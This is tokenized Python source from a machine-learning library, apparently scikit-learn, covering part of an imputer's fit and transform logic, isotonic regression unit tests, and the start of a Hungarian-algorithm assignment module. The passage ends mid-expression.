) , <EOL> X . indptr [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> columns = [ col [ astype ( mask , bool , copy = False ) ] <EOL> for col , mask in zip ( columns_all , mask_valids ) ] <EOL> if strategy == "<STR_LIT>" : <EOL> median = np . empty ( len ( columns ) ) <EOL> for i , column in enumerate ( columns ) : <EOL> median [ i ] = _get_median ( column , n_zeros_axis [ i ] ) <EOL> return median <EOL> elif strategy == "<STR_LIT>" : <EOL> most_frequent = np . empty ( len ( columns ) ) <EOL> for i , column in enumerate ( columns ) : <EOL> most_frequent [ i ] = _most_frequent ( column , <EOL> <NUM_LIT:0> , <EOL> n_zeros_axis [ i ] ) <EOL> return most_frequent <EOL> def _dense_fit ( self , X , strategy , missing_values , axis ) : <EOL> """<STR_LIT>""" <EOL> X = check_array ( X , force_all_finite = False ) <EOL> mask = _get_mask ( X , missing_values ) <EOL> masked_X = ma . masked_array ( X , mask = mask ) <EOL> if strategy == "<STR_LIT>" : <EOL> mean_masked = np . ma . mean ( masked_X , axis = axis ) <EOL> mean = np . ma . getdata ( mean_masked ) <EOL> mean [ np . ma . getmask ( mean_masked ) ] = np . nan <EOL> return mean <EOL> elif strategy == "<STR_LIT>" : <EOL> if tuple ( int ( v ) for v in np . __version__ . split ( '<STR_LIT:.>' ) [ : <NUM_LIT:2> ] ) < ( <NUM_LIT:1> , <NUM_LIT:5> ) : <EOL> masked_X . mask = np . logical_or ( masked_X . mask , <EOL> np . isnan ( X ) ) <EOL> median_masked = np . ma . median ( masked_X , axis = axis ) <EOL> median = np . ma . getdata ( median_masked ) <EOL> median [ np . ma . getmaskarray ( median_masked ) ] = np . nan <EOL> return median <EOL> elif strategy == "<STR_LIT>" : <EOL> if axis == <NUM_LIT:0> : <EOL> X = X . transpose ( ) <EOL> mask = mask . transpose ( ) <EOL> most_frequent = np . empty ( X . shape [ <NUM_LIT:0> ] ) <EOL> for i , ( row , row_mask ) in enumerate ( zip ( X [ : ] , mask [ : ] ) ) : <EOL> row_mask = np . logical_not ( row_mask ) . astype ( np . bool ) <EOL> row = row [ row_mask ] <EOL> most_frequent [ i ] = _most_frequent ( row , np . nan , <NUM_LIT:0> ) <EOL> return most_frequent <EOL> def _sparse_transform ( self , X , valid_stats , valid_idx ) : <EOL> """<STR_LIT>""" <EOL> mask = _get_mask ( X . data , self . missing_values ) <EOL> indexes = np . repeat ( np . arange ( len ( X . indptr ) - <NUM_LIT:1> , dtype = np . int ) , <EOL> np . diff ( X . indptr ) ) [ mask ] <EOL> X . data [ mask ] = astype ( valid_stats [ indexes ] , X . dtype , <EOL> copy = False ) <EOL> mask_matrix = X . __class__ ( ( mask , X . indices . copy ( ) , <EOL> X . indptr . copy ( ) ) , shape = X . shape , <EOL> dtype = X . dtype ) <EOL> mask_matrix . eliminate_zeros ( ) <EOL> features_with_missing_values = mask_matrix . sum ( axis = <NUM_LIT:0> ) . A . nonzero ( ) [ <NUM_LIT:1> ] <EOL> features_mask = safe_mask ( mask_matrix , features_with_missing_values ) <EOL> imputed_mask = mask_matrix [ : , features_mask ] <EOL> if self . axis == <NUM_LIT:0> : <EOL> self . imputed_features_ = valid_idx [ features_with_missing_values ] <EOL> else : <EOL> self . imputed_features_ = features_with_missing_values <EOL> if self . add_indicator_features : <EOL> X = sparse . hstack ( ( X , imputed_mask ) ) <EOL> return X <EOL> def _dense_transform ( self , X , valid_stats , valid_idx ) : <EOL> """<STR_LIT>""" <EOL> mask = _get_mask ( X , self . missing_values ) <EOL> n_missing = np . sum ( mask , axis = self . axis ) <EOL> values = np . repeat ( valid_stats , n_missing ) <EOL> if self . axis == <NUM_LIT:0> : <EOL> coordinates = np . where ( mask . transpose ( ) ) [ : : - <NUM_LIT:1> ] <EOL> else : <EOL> coordinates = mask <EOL> X [ coordinates ] = values <EOL> features_with_missing_values = np . where ( np . any <EOL> ( mask , axis = <NUM_LIT:0> ) ) [ <NUM_LIT:0> ] <EOL> imputed_mask = mask [ : , features_with_missing_values ] <EOL> if self . axis == <NUM_LIT:0> : <EOL> self . imputed_features_ = valid_idx [ features_with_missing_values ] <EOL> else : <EOL> self . imputed_features_ = features_with_missing_values <EOL> if self . add_indicator_features : <EOL> X = np . hstack ( ( X , imputed_mask ) ) <EOL> return X <EOL> def transform ( self , X ) : <EOL> """<STR_LIT>""" <EOL> if self . axis == <NUM_LIT:0> : <EOL> check_is_fitted ( self , '<STR_LIT>' ) <EOL> if self . axis == <NUM_LIT:1> : <EOL> X = check_array ( X , accept_sparse = '<STR_LIT>' , dtype = FLOAT_DTYPES , <EOL> force_all_finite = False , copy = self . copy ) <EOL> if sparse . issparse ( X ) : <EOL> statistics = self . _sparse_fit ( X , <EOL> self . strategy , <EOL> self . missing_values , <EOL> self . axis ) <EOL> else : <EOL> statistics = self . _dense_fit ( X , <EOL> self . strategy , <EOL> self . missing_values , <EOL> self . axis ) <EOL> else : <EOL> X = check_array ( X , accept_sparse = '<STR_LIT>' , dtype = FLOAT_DTYPES , <EOL> force_all_finite = False , copy = self . copy ) <EOL> statistics = self . statistics_ <EOL> invalid_mask = np . isnan ( statistics ) <EOL> valid_mask = np . logical_not ( invalid_mask ) <EOL> valid_statistics = statistics [ valid_mask ] <EOL> valid_idx = np . where ( valid_mask ) [ <NUM_LIT:0> ] <EOL> missing = np . arange ( X . shape [ not self . axis ] ) [ invalid_mask ] <EOL> if self . axis == <NUM_LIT:0> and invalid_mask . any ( ) : <EOL> if self . verbose : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" % missing ) <EOL> X = X [ : , valid_idx ] <EOL> elif self . axis == <NUM_LIT:1> and invalid_mask . any ( ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % missing ) <EOL> if sparse . issparse ( X ) and self . missing_values != <NUM_LIT:0> : <EOL> X = self . _sparse_transform ( X , valid_statistics , valid_idx ) <EOL> else : <EOL> if sparse . issparse ( X ) : <EOL> X = X . toarray ( ) <EOL> X = self . _dense_transform ( X , valid_statistics , valid_idx ) <EOL> return X </s>
<s> import warnings <EOL> import numpy as np <EOL> import pickle <EOL> import copy <EOL> from sklearn . isotonic import ( check_increasing , isotonic_regression , <EOL> IsotonicRegression ) <EOL> from sklearn . utils . testing import ( assert_raises , assert_array_equal , <EOL> assert_true , assert_false , assert_equal , <EOL> assert_array_almost_equal , <EOL> assert_warns_message , assert_no_warnings ) <EOL> from sklearn . utils import shuffle <EOL> def test_permutation_invariance ( ) : <EOL> ir = IsotonicRegression ( ) <EOL> x = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ] <EOL> y = [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT> ] <EOL> sample_weight = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ] <EOL> x_s , y_s , sample_weight_s = shuffle ( x , y , sample_weight , random_state = <NUM_LIT:0> ) <EOL> y_transformed = ir . fit_transform ( x , y , sample_weight = sample_weight ) <EOL> y_transformed_s = ir . fit ( x_s , y_s , sample_weight = sample_weight_s ) . transform ( x ) <EOL> assert_array_equal ( y_transformed , y_transformed_s ) <EOL> def test_check_increasing_up ( ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> y = [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:50> ] <EOL> is_increasing = assert_no_warnings ( check_increasing , x , y ) <EOL> assert_true ( is_increasing ) <EOL> def test_check_increasing_up_extreme ( ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> y = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> is_increasing = assert_no_warnings ( check_increasing , x , y ) <EOL> assert_true ( is_increasing ) <EOL> def test_check_increasing_down ( ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> y = [ <NUM_LIT:0> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:50> ] <EOL> is_increasing = assert_no_warnings ( check_increasing , x , y ) <EOL> assert_false ( is_increasing ) <EOL> def test_check_increasing_down_extreme ( ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> y = [ <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> , - <NUM_LIT:4> , - <NUM_LIT:5> ] <EOL> is_increasing = assert_no_warnings ( check_increasing , x , y ) <EOL> assert_false ( is_increasing ) <EOL> def test_check_ci_warn ( ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> y = [ <NUM_LIT:0> , - <NUM_LIT:1> , <NUM_LIT:2> , - <NUM_LIT:3> , <NUM_LIT:4> , - <NUM_LIT:5> ] <EOL> is_increasing = assert_warns_message ( UserWarning , "<STR_LIT>" , <EOL> check_increasing , <EOL> x , y ) <EOL> assert_false ( is_increasing ) <EOL> def test_isotonic_regression ( ) : <EOL> y = np . array ( [ <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:5> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:10> ] ) <EOL> y_ = np . array ( [ <NUM_LIT:3> , <NUM_LIT:6> , <NUM_LIT:6> , <NUM_LIT:8> , <NUM_LIT:8> , <NUM_LIT:8> , <NUM_LIT:10> ] ) <EOL> assert_array_equal ( y_ , isotonic_regression ( y ) ) <EOL> x = np . arange ( len ( y ) ) <EOL> ir = IsotonicRegression ( y_min = <NUM_LIT:0.> , y_max = <NUM_LIT:1.> ) <EOL> ir . fit ( x , y ) <EOL> assert_array_equal ( ir . fit ( x , y ) . transform ( x ) , ir . fit_transform ( x , y ) ) <EOL> assert_array_equal ( ir . transform ( x ) , ir . predict ( x ) ) <EOL> perm = np . random . permutation ( len ( y ) ) <EOL> ir = IsotonicRegression ( y_min = <NUM_LIT:0.> , y_max = <NUM_LIT:1.> ) <EOL> assert_array_equal ( ir . fit_transform ( x [ perm ] , y [ perm ] ) , <EOL> ir . fit_transform ( x , y ) [ perm ] ) <EOL> assert_array_equal ( ir . transform ( x [ perm ] ) , ir . transform ( x ) [ perm ] ) <EOL> ir = IsotonicRegression ( ) <EOL> assert_array_equal ( ir . fit_transform ( np . ones ( len ( x ) ) , y ) , np . mean ( y ) ) <EOL> def test_isotonic_regression_ties_min ( ) : <EOL> x = [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] <EOL> y = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] <EOL> y_true = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] <EOL> ir = IsotonicRegression ( ) <EOL> ir . fit ( x , y ) <EOL> assert_array_equal ( ir . fit ( x , y ) . transform ( x ) , ir . fit_transform ( x , y ) ) <EOL> assert_array_equal ( y_true , ir . fit_transform ( x , y ) ) <EOL> def test_isotonic_regression_ties_max ( ) : <EOL> x = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:5> ] <EOL> y = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] <EOL> y_true = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT> , <NUM_LIT> ] <EOL> ir = IsotonicRegression ( ) <EOL> ir . fit ( x , y ) <EOL> assert_array_equal ( ir . fit ( x , y ) . transform ( x ) , ir . fit_transform ( x , y ) ) <EOL> assert_array_equal ( y_true , ir . fit_transform ( x , y ) ) <EOL> def test_isotonic_regression_ties_secondary_ ( ) : <EOL> """<STR_LIT>""" <EOL> x = [ <NUM_LIT:8> , <NUM_LIT:8> , <NUM_LIT:8> , <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:12> , <NUM_LIT:12> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> ] <EOL> y = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> y_true = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> ir = IsotonicRegression ( ) <EOL> ir . fit ( x , y ) <EOL> assert_array_almost_equal ( ir . transform ( x ) , y_true , <NUM_LIT:4> ) <EOL> assert_array_almost_equal ( ir . fit_transform ( x , y ) , y_true , <NUM_LIT:4> ) <EOL> def test_isotonic_regression_reversed ( ) : <EOL> y = np . array ( [ <NUM_LIT:10> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT> , <NUM_LIT:5> ] ) <EOL> y_ = IsotonicRegression ( increasing = False ) . fit_transform ( <EOL> np . arange ( len ( y ) ) , y ) <EOL> assert_array_equal ( np . ones ( y_ [ : - <NUM_LIT:1> ] . shape ) , ( ( y_ [ : - <NUM_LIT:1> ] - y_ [ <NUM_LIT:1> : ] ) >= <NUM_LIT:0> ) ) <EOL> def test_isotonic_regression_auto_decreasing ( ) : <EOL> y = np . array ( [ <NUM_LIT:10> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:7> , <NUM_LIT:6> , <NUM_LIT> , <NUM_LIT:5> ] ) <EOL> x = np . arange ( len ( y ) ) <EOL> ir = IsotonicRegression ( increasing = '<STR_LIT>' ) <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . simplefilter ( "<STR_LIT>" ) <EOL> y_ = ir . fit_transform ( x , y ) <EOL> assert_true ( all ( [ "<STR_LIT>" <EOL> in str ( warn . message ) for warn in w ] ) ) <EOL> is_increasing = y_ [ <NUM_LIT:0> ] < y_ [ - <NUM_LIT:1> ] <EOL> assert_false ( is_increasing ) <EOL> def test_isotonic_regression_auto_increasing ( ) : <EOL> y = np . array ( [ <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:10> , <NUM_LIT:9> , <NUM_LIT:10> ] ) <EOL> x = np . arange ( len ( y ) ) <EOL> ir = IsotonicRegression ( increasing = '<STR_LIT>' ) <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . simplefilter ( "<STR_LIT>" ) <EOL> y_ = ir . fit_transform ( x , y ) <EOL> assert_true ( all ( [ "<STR_LIT>" <EOL> in str ( warn . message ) for warn in w ] ) ) <EOL> is_increasing = y_ [ <NUM_LIT:0> ] < y_ [ - <NUM_LIT:1> ] <EOL> assert_true ( is_increasing ) <EOL> def test_assert_raises_exceptions ( ) : <EOL> ir = IsotonicRegression ( ) <EOL> rng = np . random . RandomState ( <NUM_LIT> ) <EOL> assert_raises ( ValueError , ir . fit , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:3> ] , [ <NUM_LIT:0.1> , <NUM_LIT> ] ) <EOL> assert_raises ( ValueError , ir . fit , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:5> , <NUM_LIT:7> ] ) <EOL> assert_raises ( ValueError , ir . fit , rng . randn ( <NUM_LIT:3> , <NUM_LIT:10> ) , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> assert_raises ( ValueError , ir . transform , rng . randn ( <NUM_LIT:3> , <NUM_LIT:10> ) ) <EOL> def test_isotonic_sample_weight_parameter_default_value ( ) : <EOL> ir = IsotonicRegression ( ) <EOL> rng = np . random . RandomState ( <NUM_LIT> ) <EOL> n = <NUM_LIT:100> <EOL> x = np . arange ( n ) <EOL> y = rng . randint ( - <NUM_LIT:50> , <NUM_LIT:50> , size = ( n , ) ) + <NUM_LIT> * np . log ( <NUM_LIT:1> + np . arange ( n ) ) <EOL> weights = np . ones ( n ) <EOL> y_set_value = ir . fit_transform ( x , y , sample_weight = weights ) <EOL> y_default_value = ir . fit_transform ( x , y ) <EOL> assert_array_equal ( y_set_value , y_default_value ) <EOL> def test_isotonic_min_max_boundaries ( ) : <EOL> ir = IsotonicRegression ( y_min = <NUM_LIT:2> , y_max = <NUM_LIT:4> ) <EOL> n = <NUM_LIT:6> <EOL> x = np . arange ( n ) <EOL> y = np . arange ( n ) <EOL> y_test = [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:4> ] <EOL> y_result = np . round ( ir . fit_transform ( x , y ) ) <EOL> assert_array_equal ( y_result , y_test ) <EOL> def test_isotonic_sample_weight ( ) : <EOL> ir = IsotonicRegression ( ) <EOL> x = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ] <EOL> y = [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT> ] <EOL> sample_weight = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ] <EOL> expected_y = [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> received_y = ir . fit_transform ( x , y , sample_weight = sample_weight ) <EOL> assert_array_equal ( expected_y , received_y ) <EOL> def test_isotonic_regression_oob_raise ( ) : <EOL> y = np . array ( [ <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:5> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:10> ] ) <EOL> x = np . arange ( len ( y ) ) <EOL> ir = IsotonicRegression ( increasing = '<STR_LIT>' , out_of_bounds = "<STR_LIT>" ) <EOL> ir . fit ( x , y ) <EOL> assert_raises ( ValueError , ir . predict , [ min ( x ) - <NUM_LIT:10> , max ( x ) + <NUM_LIT:10> ] ) <EOL> def test_isotonic_regression_oob_clip ( ) : <EOL> y = np . array ( [ <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:5> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:10> ] ) <EOL> x = np . arange ( len ( y ) ) <EOL> ir = IsotonicRegression ( increasing = '<STR_LIT>' , out_of_bounds = "<STR_LIT>" ) <EOL> ir . fit ( x , y ) <EOL> y1 = ir . predict ( [ min ( x ) - <NUM_LIT:10> , max ( x ) + <NUM_LIT:10> ] ) <EOL> y2 = ir . predict ( x ) <EOL> assert_equal ( max ( y1 ) , max ( y2 ) ) <EOL> assert_equal ( min ( y1 ) , min ( y2 ) ) <EOL> def test_isotonic_regression_oob_nan ( ) : <EOL> y = np . array ( [ <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:5> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:10> ] ) <EOL> x = np . arange ( len ( y ) ) <EOL> ir = IsotonicRegression ( increasing = '<STR_LIT>' , out_of_bounds = "<STR_LIT>" ) <EOL> ir . fit ( x , y ) <EOL> y1 = ir . predict ( [ min ( x ) - <NUM_LIT:10> , max ( x ) + <NUM_LIT:10> ] ) <EOL> assert_equal ( sum ( np . isnan ( y1 ) ) , <NUM_LIT:2> ) <EOL> def test_isotonic_regression_oob_bad ( ) : <EOL> y = np . array ( [ <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:5> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:10> ] ) <EOL> x = np . arange ( len ( y ) ) <EOL> ir = IsotonicRegression ( increasing = '<STR_LIT>' , out_of_bounds = "<STR_LIT>" ) <EOL> assert_raises ( ValueError , ir . fit , x , y ) <EOL> def test_isotonic_regression_oob_bad_after ( ) : <EOL> y = np . array ( [ <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:5> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:10> ] ) <EOL> x = np . arange ( len ( y ) ) <EOL> ir = IsotonicRegression ( increasing = '<STR_LIT>' , out_of_bounds = "<STR_LIT>" ) <EOL> ir . fit ( x , y ) <EOL> ir . out_of_bounds = "<STR_LIT>" <EOL> assert_raises ( ValueError , ir . transform , x ) <EOL> def test_isotonic_regression_pickle ( ) : <EOL> y = np . array ( [ <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:5> , <NUM_LIT:9> , <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT:10> ] ) <EOL> x = np . arange ( len ( y ) ) <EOL> ir = IsotonicRegression ( increasing = '<STR_LIT>' , out_of_bounds = "<STR_LIT>" ) <EOL> ir . fit ( x , y ) <EOL> ir_ser = pickle . dumps ( ir , pickle . HIGHEST_PROTOCOL ) <EOL> ir2 = pickle . loads ( ir_ser ) <EOL> np . testing . assert_array_equal ( ir . predict ( x ) , ir2 . predict ( x ) ) <EOL> def test_isotonic_duplicate_min_entry ( ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> y = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> ir = IsotonicRegression ( increasing = True , out_of_bounds = "<STR_LIT>" ) <EOL> ir . fit ( x , y ) <EOL> all_predictions_finite = np . all ( np . isfinite ( ir . predict ( x ) ) ) <EOL> assert_true ( all_predictions_finite ) <EOL> def test_isotonic_zero_weight_loop ( ) : <EOL> rng = np . random . RandomState ( <NUM_LIT> ) <EOL> regression = IsotonicRegression ( ) <EOL> n_samples = <NUM_LIT:50> <EOL> x = np . linspace ( - <NUM_LIT:3> , <NUM_LIT:3> , n_samples ) <EOL> y = x + rng . uniform ( size = n_samples ) <EOL> w = rng . uniform ( size = n_samples ) <EOL> w [ <NUM_LIT:5> : <NUM_LIT:8> ] = <NUM_LIT:0> <EOL> regression . fit ( x , y , sample_weight = w ) <EOL> regression . fit ( x , y , sample_weight = w ) <EOL> def test_fast_predict ( ) : <EOL> rng = np . random . RandomState ( <NUM_LIT> ) <EOL> n_samples = <NUM_LIT:10> ** <NUM_LIT:3> <EOL> X_train = <NUM_LIT> * rng . rand ( n_samples ) - <NUM_LIT:10> <EOL> y_train = np . less ( <EOL> rng . rand ( n_samples ) , <EOL> <NUM_LIT:1.0> / ( <NUM_LIT:1.0> + np . exp ( - X_train ) ) <EOL> ) . astype ( '<STR_LIT>' ) <EOL> weights = rng . rand ( n_samples ) <EOL> weights [ rng . rand ( n_samples ) < <NUM_LIT:0.1> ] = <NUM_LIT:0> <EOL> slow_model = IsotonicRegression ( y_min = <NUM_LIT:0> , y_max = <NUM_LIT:1> , out_of_bounds = "<STR_LIT>" ) <EOL> fast_model = IsotonicRegression ( y_min = <NUM_LIT:0> , y_max = <NUM_LIT:1> , out_of_bounds = "<STR_LIT>" ) <EOL> X_train_fit , y_train_fit = slow_model . _build_y ( X_train , y_train , <EOL> sample_weight = weights , <EOL> trim_duplicates = False ) <EOL> slow_model . _build_f ( X_train_fit , y_train_fit ) <EOL> fast_model . fit ( X_train , y_train , sample_weight = weights ) <EOL> X_test = <NUM_LIT> * rng . rand ( n_samples ) - <NUM_LIT:10> <EOL> y_pred_slow = slow_model . predict ( X_test ) <EOL> y_pred_fast = fast_model . predict ( X_test ) <EOL> assert_array_equal ( y_pred_slow , y_pred_fast ) <EOL> def test_isotonic_copy_before_fit ( ) : <EOL> ir = IsotonicRegression ( ) <EOL> copy . copy ( ir ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from . fixes import astype <EOL> def linear_assignment ( X ) : <EOL> """<STR_LIT>""" <EOL> indices = _hungarian ( X ) . tolist ( ) <EOL> indices . sort ( ) <EOL> indices = np . array ( indices , dtype = int ) <EOL> indices . shape = ( - <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> return indices <EOL> class _HungarianState ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , cost_matrix ) : <EOL> cost_matrix = np . atleast_2d ( cost_matrix ) <EOL> transposed = ( cost_matrix . shape [ <NUM_LIT:1> ] < cost_matrix . shape [ <NUM_LIT:0> ] ) <EOL> if transposed : <EOL> self . C = ( cost_matrix . T ) . copy ( ) <EOL> else : <EOL> self . C = cost_matrix . copy ( ) <EOL> self . transposed = transposed <EOL> n , m = self . C . shape <EOL> self . row_uncovered = np . ones ( n , dtype = np . bool ) <EOL> self . col_uncovered = np . ones ( m , dtype = np . bool ) <EOL> self . Z0_r = <NUM_LIT:0> <EOL> self . Z0_c = <NUM_LIT:0> <EOL> self . path = np . zeros ( ( n + m , <NUM_LIT:2> ) , dtype = int ) <EOL> self . marked = np . zeros ( ( n , m ) , dtype = int ) <EOL> def _find_prime_in_row ( self , row ) : <EOL> """<STR_LIT>""" <EOL> col = np . argmax ( self . marked [ row ] == <NUM_LIT:2> ) <EOL> if self . marked [ row , col ] != <NUM_LIT:2> : <EOL> col = - <NUM_LIT:1> <EOL> return col <EOL> def _clear_covers ( self ) : <EOL> """<STR_LIT>""" <EOL> self . row_uncovered [ : ] = True <EOL> self . col_uncovered [ : ] = True <EOL> def _hungarian ( cost_matrix ) : <EOL> """<STR_LIT>""" <EOL> state = _HungarianState ( cost_matrix ) <EOL> step = None if <NUM_LIT:0> in cost_matrix . shape else _step1 <EOL> while step is not None : <EOL> step = step ( state ) <EOL> results = np . array ( np . where ( state . marked == <NUM_LIT:1> ) ) . T <EOL> if state . transposed : <EOL> results = results [ : , : : - <NUM_LIT:1> ] <EOL> return results <EOL> def _step1 ( state ) : <EOL> """<STR_LIT>""" <EOL> state . C -= state . C . min ( axis = <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> for i , j in zip ( * np . where ( state . C == <NUM_LIT:0> ) ) : <EOL> if state . col_uncovered [ j ] and state . row_uncovered [ i ] : <EOL> state . marked [ i , j ] = <NUM_LIT:1> <EOL> state . col_uncovered [ j ] = False <EOL> state . row_uncovered [ i ] = False <EOL> state . _clear_covers ( ) <EOL> return _step3 <EOL> def _step3 ( state ) : <EOL> """<STR_LIT>""" <EOL> marked = ( state . marked == <NUM_LIT:1> ) <EOL> state . col_uncovered [ np . any ( marked , axis = <NUM_LIT:0> ) ] = False <EOL> if marked . sum ( ) < state . C . shape [ <NUM_LIT:0> ] : <EOL> return _step4 <EOL> def _step4 ( state ) : <EOL> """<STR_LIT>""" <EOL> C = ( state . C == <NUM_LIT:0> ) . astype ( np . int ) <EOL> covered_C = C * state . row_uncovered [ : , np . newaxis ] <EOL> covered_C *= astype ( state . col_uncovered , dtype = np . int , copy = False ) <EOL> n = state . C . shape [ <NUM_LIT:0> ] <EOL> m = state . C . shape [ <NUM_LIT:1> ] <EOL> while True : <EOL> row , col = np . unravel_index ( np . argmax ( covered_C ) , ( n , m ) ) <EOL> if covered_C [ row , col ] == <NUM_LIT:0> : <EOL> return _step6 <EOL> else : <EOL> state . marked [ row , col ] = <NUM_LIT:2> <EOL> star_col = np . argmax ( state . marked [ row ] == <NUM_LIT:1> ) <EOL> if not state . marked [ row , star_col ] == <NUM_LIT:1> : <EOL> state . Z0_r = row <EOL> state . Z0_c = col <EOL> return _step5 <EOL> else : <EOL> col = star_col <EOL> state . row_uncovered [ row ] = False <EOL> state . col_uncovered [ col ] = True <EOL> covered_C [ : , col ] = C [ : , col ] * ( <EOL> astype ( state . row_uncovered , dtype = np . int , copy = False ) ) <EOL> covered_C [ row ] = <NUM_LIT:0> <EOL> def _step5 ( state ) : <EOL> """<STR_LIT>""" <EOL> count = <NUM_LIT:0> <EOL> path = state . path <EOL> path [ count , <NUM_LIT:0> ] = state . Z0_r <EOL> path [ count , <NUM_LIT:1> ] = state . Z0_c <EOL> while True : <EOL> row = np . argmax ( state . marked [ : , path [ count , <NUM_LIT:1> ] ] == <NUM_LIT:1> ) <EOL> if not state . marked [ row , path [ count , <NUM_LIT:1> ] ] == <NUM_LIT:1> : <EOL> break <EOL> else : <EOL> count += <NUM_LIT:1> <EOL> path [ count , <NUM_LIT:0> ] = row <EOL> path [ count , <NUM_LIT:1> ] = path [ count - <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> col = np . argmax ( state . marked [ path [ count , 